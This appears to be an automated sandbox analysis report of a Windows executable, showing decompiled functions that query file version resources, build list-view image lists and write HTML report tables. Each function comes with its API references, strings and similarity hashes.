					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040DFD6();
						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
							goto L5;
						}
					}
					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040E032();
				}
				return _t97;
			}

0x0040de36
0x0040de47
0x0040de49
0x0040de4c
0x0040de53
0x0040de56
0x0040de5f
0x0040de64
0x0040de67
0x0040de6d
0x0040de77
0x0040de91
0x0040de93
0x0040de96
0x0040de99
0x0040de9c
0x0040de9f
0x0040dea1
0x0040dea4
0x0040dea7
0x0040deaa
0x0040dead
0x0040deb0
0x0040deb3
0x0040deb6
0x0040deb6
0x0040dece
0x0040df08
0x0040df11
0x0040ded0
0x0040ded0
0x0040deda
0x0040dedb
0x0040dedc
0x0040dee4
0x0040dee6
0x0040dee7
0x0040df06
0x00000000
0x00000000
0x0040df06
0x0040df25
0x0040df3a
0x0040df4f
0x0040df64
0x0040df79
0x0040df8e
0x0040dfa3
0x0040dfb8
0x0040dfbf
0x0040dfc0
0x0040dfc1
0x0040dfc7
0x0040dfcc

APIs

GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
??2@YAPAXI@Z.MSVCRT ref: 0040DE67
GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
_snwprintf.MSVCRT ref: 0040DEE7
wcscpy.MSVCRT ref: 0040DF11
??3@YAXPAX@Z.MSVCRT ref: 0040DFC1

Strings

\VarFileInfo\Translation, xrefs: 0040DEC1
CompanyName, xrefs: 0040DF69
OriginalFileName, xrefs: 0040DFA8
%4.4X%4.4X, xrefs: 0040DEDC
ProductName, xrefs: 0040DF18
FileVersion, xrefs: 0040DF3F
ProductVersion, xrefs: 0040DF54
LegalCopyright, xrefs: 0040DF93
InternalName, xrefs: 0040DF7E
FileDescription, xrefs: 0040DF2A
040904E4, xrefs: 0040DF0B

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
Opcode Fuzzy Hash: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 004099C4, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004099C4(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2b4) = _t48;
						__imp__ImageList_SetImageCount(_t48, 1);
						_push( *(_t62 + 0x2b4));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2b4) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2b8) = _t46;
					__imp__ImageList_SetImageCount(_t46, 1);
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
				}
				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
			}

0x004099cc
0x004099d3
0x004099e4
0x004099f0
0x00409a65
0x00409a6a
0x00409a70
0x00409a76
0x004099f2
0x00409a00
0x00409a07
0x00409a17
0x00409a1c
0x00409a2e
0x00409a4c
0x00409a52
0x00409a58
0x00409a58
0x00409a89
0x00409a89
0x00409a91
0x00409a9d
0x00409aa2
0x00409aa8
0x00409ac0
0x00409ac0
0x00409ad5
0x00409af4
0x00409b0a
0x00409b17
0x00409b1b
0x00409b23
0x00409b34
0x00409b3e
0x00409b4e
0x00409b5a
0x00409b60
0x00409b89

APIs

memset.MSVCRT ref: 00409A07
memset.MSVCRT ref: 00409A1C
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
LoadImageW.USER32 ref: 00409AED
GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
LoadImageW.USER32 ref: 00409B0A
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
GetSysColor.USER32(0000000F), ref: 00409B23
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
DeleteObject.GDI32(?), ref: 00409B5A
DeleteObject.GDI32(?), ref: 00409B60
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC79, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040DBA9(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040dc79
0x0040dc94
0x0040dc9b
0x0040dca9
0x0040dcb0
0x0040dcb5
0x0040dcbc
0x0040dcc3
0x0040dcca
0x0040dcca
0x0040dcd0
0x0040dcd3
0x0040dcd6
0x0040dce2
0x0040dce7
0x0040dcee
0x0040dcf0
0x0040dcf1
0x0040dcfc
0x0040dd01
0x0040dd02
0x0040dd0f
0x0040dd14
0x0040dd14
0x0040dd17
0x0040dd1d
0x0040dd2c
0x0040dd2d
0x0040dd38
0x0040dd3d
0x0040dd3e
0x0040dd4b
0x0040dd50
0x0040dd59
0x0040dd5f
0x0040dd63
0x0040dd6b
0x0040dd71
0x0040dd76
0x0040dd80
0x0040dd88
0x0040dd8e
0x0040dd92
0x0040dd9a
0x0040dda0
0x0040dda6

APIs

memset.MSVCRT ref: 0040DC9B
memset.MSVCRT ref: 0040DCB0
wcscpy.MSVCRT ref: 0040DCE2
_snwprintf.MSVCRT ref: 0040DD02
wcscat.MSVCRT ref: 0040DD0F
_snwprintf.MSVCRT ref: 0040DD3E
wcscat.MSVCRT ref: 0040DD4B
wcscat.MSVCRT ref: 0040DD59
wcscat.MSVCRT ref: 0040DD6B
wcscat.MSVCRT ref: 0040DD76
wcscat.MSVCRT ref: 0040DD88
wcscat.MSVCRT ref: 0040DD9A

Strings

color="#%s", xrefs: 0040DD2D
</b>, xrefs: 0040DD82
size="%d", xrefs: 0040DCF1
</font>, xrefs: 0040DD94
<font, xrefs: 0040DCDC
<b>, xrefs: 0040DD65

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18

Uniqueness

Uniqueness Score: -1.00%

Function 00408C24, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t151 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t159 = _t157 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
				if(_t87 != 0xffffffff) {
					_t128 =  &_v964;
					_push(E0040DBA9(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040DFD6();
					_t159 = _t159 + 0x18;
				}
				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t151;
				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
						_v12 = _t154;
						_t155 = _t154 * 0x14;
						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t151;
						_t152 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
						E0040DBA9(_v32,  &_v348);
						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
						} else {
							_push( *(_t155 + _v16 + 0x10));
							_push(E0040DBA9(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x70));
							L0040DFD6();
							_t159 = _t159 + 0x14;
						}
						_t109 =  *(_t124 + 0x6c);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
							_pop(_t128);
						}
						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
						_push( *((intOrPtr*)(_t124 + 0x74)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x70));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x68)));
						L0040DFD6();
						_t159 = _t159 + 0x28;
						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
							goto L14;
						}
						_t151 = 0;
					}
				}
				L14:
				E00408857(_t124, _t128, _a4, L"</table><p>");
				return E00408857(_t124, _t128, _a4, L"\r\n");
			}

0x00408c24
0x00408c2d
0x00408c45
0x00408c4c
0x00408c58
0x00408c5a
0x00408c5c
0x00408c68
0x00408c6f
0x00408c7e
0x00408c85
0x00408c94
0x00408c9b
0x00408ca2
0x00408ca7
0x00408cad
0x00408cb3
0x00408cb6
0x00408cb8
0x00408cc5
0x00408cc6
0x00408cd1
0x00408cd3
0x00408cd4
0x00408cd9
0x00408cd9
0x00408ce6
0x00408cee
0x00408cf1
0x00408cfb
0x00408d01
0x00408d07
0x00408d0a
0x00408d11
0x00408d1f
0x00408d25
0x00408d28
0x00408d2c
0x00408d30
0x00408d38
0x00408d3b
0x00408d46
0x00408d53
0x00408d69
0x00408d79
0x00408d86
0x00408dc0
0x00408d88
0x00408d8b
0x00408d9e
0x00408d9f
0x00408da4
0x00408da9
0x00408dac
0x00408db1
0x00408db1
0x00408dc7
0x00408dca
0x00408dd0
0x00408dde
0x00408de4
0x00408de4
0x00408dee
0x00408df3
0x00408dfc
0x00408e03
0x00408e04
0x00408e0d
0x00408e14
0x00408e15
0x00408e1a
0x00408e1d
0x00408e22
0x00408e2d
0x00408e32
0x00408e3b
0x00000000
0x00000000
0x00408cf9
0x00408cf9
0x00408cfb
0x00408e41
0x00408e4b
0x00408e62

APIs

memset.MSVCRT ref: 00408C45
memset.MSVCRT ref: 00408C6F
memset.MSVCRT ref: 00408C85
memset.MSVCRT ref: 00408C9B
_snwprintf.MSVCRT ref: 00408CD4
wcscpy.MSVCRT ref: 00408D1F
_snwprintf.MSVCRT ref: 00408DAC
wcscat.MSVCRT ref: 00408DDE

Part of subcall function 0040DBA9: _snwprintf.MSVCRT ref: 0040DBCD

wcscpy.MSVCRT ref: 00408DC0
_snwprintf.MSVCRT ref: 00408E1D

Strings

<table border="1" cellpadding="5">, xrefs: 00408CDC
<font color="%s">%s</font>, xrefs: 00408D9F
 , xrefs: 00408DD8
bgcolor="%s", xrefs: 00408CC6
nowrap, xrefs: 00408D19
</table><p>, xrefs: 00408E41
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 00408C4D

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409190, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t75 = __ecx;
				E0040E340(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040DBA9(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040DFD6();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040DBA9(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040DFD6();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040DFD6();
				_t80 = _t79 + 0x10;
				E00408857(_a4, _t75, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040DFD6();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040DFD6();
						_t80 = _t81 + 0x1c;
						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00409190
0x00409198
0x004091af
0x004091b6
0x004091c4
0x004091cb
0x004091d9
0x004091e0
0x004091e5
0x004091ec
0x004091fd
0x004091fe
0x00409209
0x0040920e
0x0040920f
0x00409214
0x00409214
0x0040921b
0x0040922c
0x0040922d
0x00409238
0x0040923d
0x0040923e
0x0040924f
0x00409254
0x00409254
0x0040925d
0x0040925e
0x00409269
0x0040926e
0x0040926f
0x00409274
0x00409284
0x00409289
0x0040928e
0x00409298
0x0040929b
0x0040929e
0x004092a7
0x004092ae
0x004092b3
0x004092b5
0x004092bb
0x004092d9
0x004092bd
0x004092bd
0x004092be
0x004092c9
0x004092ce
0x004092cf
0x004092d4
0x004092d4
0x004092e6
0x004092e7
0x004092f0
0x004092f7
0x004092f8
0x00409303
0x00409308
0x00409309
0x0040930e
0x0040931e
0x00409323
0x00409326
0x00409326
0x00409326
0x00000000
0x0040932f
0x00409333

APIs

memset.MSVCRT ref: 004091B6
memset.MSVCRT ref: 004091CB
memset.MSVCRT ref: 004091E0
_snwprintf.MSVCRT ref: 0040920F
_snwprintf.MSVCRT ref: 0040923E
wcscpy.MSVCRT ref: 0040924F
_snwprintf.MSVCRT ref: 0040926F
memset.MSVCRT ref: 004092AE
_snwprintf.MSVCRT ref: 004092CF
_snwprintf.MSVCRT ref: 00409309

Part of subcall function 0040DBA9: _snwprintf.MSVCRT ref: 0040DBCD

Strings

<th%s>%s%s%s, xrefs: 004092F8
<font color="%s">, xrefs: 0040922D
</font>, xrefs: 00409249
bgcolor="%s", xrefs: 004091FE
width="%s", xrefs: 004092BE
<table border="1" cellpadding="5"><tr%s>, xrefs: 0040925E

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407297, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040E340(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00405800( &_v532);
				_pop(_t44);
				E0040674D( &_v5164);
				_t27 = E0040DE36( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x412c38, _a8);
				wcscpy(0x412e48, L"general");
				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
				E00406DE5(_t61, L"Version",  &_v1044, 1);
				E00406DE5(_t61, L"RTL", "0", 0);
				_t13 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t13, 4, E00407047, 0);
				_t14 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t14, 5, E00407047, 0);
				wcscpy(0x412e48, L"strings");
				_t38 = E00407170(_t44, _t61, _a4);
				 *0x412c38 =  *0x412c38 & 0x00000000;
				return _t38;
			}

0x0040729f
0x004072b6
0x004072bd
0x004072d2
0x004072d9
0x004072e8
0x004072ed
0x004072f4
0x00407306
0x0040730b
0x0040730d
0x0040731d
0x00407323
0x00407323
0x0040732c
0x0040733c
0x0040734d
0x0040735e
0x00407374
0x00407387
0x0040739e
0x004073a1
0x004073a8
0x004073ab
0x004073b3
0x004073bb
0x004073c3
0x004073cf

APIs

memset.MSVCRT ref: 004072BD
memset.MSVCRT ref: 004072D9

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11

wcscpy.MSVCRT ref: 0040731D
wcscpy.MSVCRT ref: 0040732C
wcscpy.MSVCRT ref: 0040733C
EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
